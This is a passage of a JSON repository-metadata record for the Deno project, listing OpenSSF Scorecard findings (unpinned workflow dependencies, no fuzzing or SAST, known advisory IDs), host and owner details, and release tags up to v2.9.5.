https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36685524,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-15T02:00:05.847Z","response_time":94,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_a